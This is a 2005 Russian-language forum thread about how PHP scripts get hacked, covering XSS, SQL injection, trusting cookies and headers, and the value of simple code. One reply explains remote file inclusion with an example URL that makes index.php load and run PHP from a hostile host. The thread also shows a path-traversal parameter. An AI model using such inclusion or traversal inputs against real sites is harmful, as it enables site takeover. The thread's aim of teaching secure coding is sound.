|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 20:43)
| | | Ясно. Учту впоследствие. :) | |
| |
|
|
| |
|
|
| |
для: Евгений Петров
(24.10.2005 в 20:12)
| | | Там идёт игра на том, что вместо относительного пути указывается сетевой путь index.php?temp=http://www.mysite.ru/src/index.txt. Файл на враждебном хосте имеет расширение txt и не интерпретируется, т.е. вставляется как есть. После этого в index.php пишется что-то вроде
<?php
echo "Hello world! Ваш сайта взломан";
?>
|
И получается, что PHP-код выполняется. Вместо echo каждый подставляет код в меру своей испорченности, от удалённого монитора, до уничтожения виртуального хоста. | |
| |
|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 19:46)
| | | С инклудой понятно (насколько я понял можно просто подставить свой код) А чем опасна index.php?temp=../src/index.php ? | |
| |
|
|
| |
|
|
| |
для: Евгений Петров
(24.10.2005 в 15:22)
| | | В статье Безопасное программирование на PHP имеется пару ссылок на статьи по межсайтовому скрптингу (XSS), хотя он не так опасен как SQL-инъекции, но его не следует недооценивать. Всё остальное сводится принебрежением к суперглобальным массивам и использованием конструкций вида
и обращение к странице навроде index.php?temp=../src/index.php
Ошибки в авторизации, доверие пользователю, позволяющие подделывать куки, пользовательские агенты, рефереры и загружать вместо целевого файла всякую белиберду. | |
| |
|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 13:08)
| | | Когда я начинал писать первые коды, я совершил большую ошибку, т.к. думал, чем больше код тем лучше (мол как так маленький код может хорошо работать) и работало все не очень хорошо :)
Я считаю, что каждому новичку надо напоминать, что "Простота залог успеха.". | |
| |
|
|
| |
|
|
| |
для: cheops
(24.10.2005 в 13:08)
| | | А какие существуют приемы (кроме SQL конечно) взлома скриптов? Подкиньте статью плиз.... | |
| |
|
|
| |
|
|
| |
для: Akira
(24.10.2005 в 01:51)
| | | Нет почему об этом пишут http://www.softtime.ru/info/read.php?id_article=51, кроме того, плотность ошибок не зависит от языка программирования, а зависит только от квалификации программиста, поэтому чем меньше ваш код по объёму, тем меньше там ошибок. Именно поэтому прибегают к регулярным выражениям, SQL и другим мини-языкам - код короче получается. | |
| |
|
|
| |
|
|
| |
для: @ndry
(23.10.2005 в 23:21)
| | | antichat.ru да и другие есть.
Дело в том, что чем больше форум популярен и чем больше в нем возможностей, тем больше его ломают.
Странно, но почему то не видел, что бы писали о том, что: "С ростом кода и его сложности, возможность "багов" увеличиваеться если не в геометрической, то в математической прогресии."
Если бы я знал, это раньше мне бы это помогло.
отсюда вывод. Кода должен быть как можно меньше и он должен быть как можно проще. | |
| |
|
|
| |
|
|
| |
для: Евгений Петров
(23.10.2005 в 22:37)
| | | они не актуальны | |
| |
|
|
|
